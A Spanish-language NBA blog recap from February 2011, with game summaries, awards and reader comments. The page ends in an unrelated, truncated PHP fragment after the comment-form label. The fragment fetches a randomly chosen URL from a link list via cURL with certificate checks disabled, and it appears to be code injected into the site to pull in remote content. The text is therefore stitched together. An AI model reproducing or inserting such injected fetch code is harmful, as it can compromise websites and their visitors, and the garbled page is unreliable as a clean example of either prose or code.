La Crónica (15/02/2011)

16 de February de 2011 por TheDeerHunter

Hemos hablado mucho de la frontera psicológica que significaba Portland para los equipos a la caza de la última plaza de playoffs en el Oeste. Tras los últimos acontecimientos de las últimas semanas el eslabón débil ha pasado a ser Utah. Anoche fueron derrotados en Phoenix por un único punto en lo que puede ser un resultado clave en la batalla de la que nos ocupamos (101-102). Steve Nash sacó jugo de los nervios de Deron Williams y Channing Frye martilleó con sus lanzamientos la defensa del equipo de (suena raro) Tyrone Corbin. Golpe moral importante y una extraordinaria actuación de Al Jefferson que se va al limbo.

Los Grizzlies, en cambio, se ponen a las puertas de la zona noble con la importante victoria ante otro equipo en buena forma como Philadelphia (91-102). Anoche no lo demostraron demasiado y sólo Thaddeus y Louis Williams desde el banquillo pudieron decir que pusieron en aprietos a la defensa de los de Lionel Hollins. Un buen partido de Conley y Randolph fue suficiente para amarrar el resultado. Volvió OJ Mayo tras su incidente “toxicológico”. ¡Qué importante sería para Memphis recuperar ahora a este jugador para la causa!

En la zona alta los Bulls no se dejaron sorprender en casa contra los “antiamarillos” Bobcats (94-106). Rose se comió a Augustin haciendo jugar a los suyos y Luol Deng cuajó uno de los mejores partidos de la temporada superando a Gerald Wallace para asegurar otra victoria cómoda. Tras ellos marchan sólidos los Heat. Entre los tres “beach boys” tuvieron que producir 90 puntos para doblegar a unos Pacers que no les regalaron nada (110-103). Cuidado porque Mike Miller se resintió de un golpe en la cabeza y podría volver a la lista de lesionados.

Para terminar los Thunder destrozaron a los Kings en Oklahoma (96-126). En el equipo local se pusieron las botas con 7 tíos en dobles figuras y dos más a las puertas. DeMarcus Cousins volvió a ser el mejor de los suyos a pesar de que no jugó de inicio. Por su parte los Hornets protagonizaron la sorpresa negativa de la jornada haciendo aguas en Oakland ante los Warriors (89-102).

PREMIOS

MVP: El Big Three de los Heat se fue a los 90 puntos, con Dwyane Wade como el jugador más destacado con 41. Además, fue capaz de recoger 12 rebotes y robar un par de balones.

Rookie: Los Kings perdonaron a Demarcus Cousins y el chico lo celebró a lo grande: con 21 puntos y 13 rebotes. Eso sí, nueva derrota de su equipo. ¿Será sintomático?

Sorpresa: Channing Frye recuperó el fusil y ametralló a los Jazz con 6 triples, aderezados con 11 rebotes y un total de 31 puntos.

Decepción: Mal día para un Darren Collison que sólo fue capaz de anotar 1 de los 11 lanzamientos que realizó.

Esfuerzo en vano: Al Jefferson anotó 32 puntos y capturó 10 rebotes en la búsqueda de los Jazz de la primera victoria de la era post-Sloan. De momento, no la han encontrado.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Apuesto a que nash será uno de los mejores bases sin anillo que hay en la historia de la nba, por detras de Stockton.

      Citar

  2. Rompe dice:
    #2

    Menuda exhibición de Wade en el primer cuarto… 22 puntazos!

      Citar

  3. Scriers dice:
    #3

    Gran partido entre Suns y Jazz, la verdad, da gusto ver un partido de los Suns, ojala se cuelen octavos. Nash creo que va a dar pases con 40 años. Qué bárbaro.

      Citar

  4. TheDeerHunter dice:
    #4

    Sí, pero el pase que le suelta a Frye para el último triple es una castaña de cuidado…

      Citar

  5. luigi_sal dice:
    #5

    si los suns aceleran un poquito y aprietan en el rebote y un pelín en defensa, estoy seguro de que se meten tras portland y memphis. creo que utah y nueva orleans van para abajo. ojalá! es más divertido ver a los osos y a los soles

      Citar

  6. Sempren dice:
    #6

    Parece que Jarret Jack está mejorando últimamente. Puede ser por las bajas, pero en los últimos partidos le he visto pasar de 10 puntos en varias ocasiones.

      Citar

  7. Tobal dice:
    #7

    Que bien están los Grizzlies,que como continuen así,se meterán en play offs,aunque el Oeste está muy dificil,pero tanto los Jazz como los Nuggets van para atrás,si no lo remedian pronto.

      Citar

  8. sergio dice:
    #8

    q verguenza de Lakers……

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>